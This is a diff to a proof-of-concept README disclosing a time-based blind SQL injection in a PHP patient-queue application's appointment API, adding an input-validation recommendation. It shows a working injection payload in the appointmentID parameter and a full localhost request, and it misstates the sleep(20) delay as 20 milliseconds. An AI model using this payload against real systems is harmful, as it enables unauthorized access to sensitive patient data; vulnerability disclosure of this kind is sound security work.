rayficom/Proof-of-Concept/20260218/README.md

    AppointmentId: '%2b(select*from(select(sleep(20)))a)%2b'
    ```

-9. Attacker can manuplate the database to delay in 20 milli-seconds and access the unauthorized sensitive information.
+9. Attacker can manipulate the database to delay in 20 milli-seconds and access the unauthorized sensitive information.
    ```
    http://localhost/pqms/php/api_patient_schedule.php?appointmentID='%2b(select*from(select(sleep(20)))a)%2b'
    ```
    ![Description of image](20260218-pqms-006.png)

+## Recommendations:
+It is recommended to apply the input validation for protecting the application from this attack vector.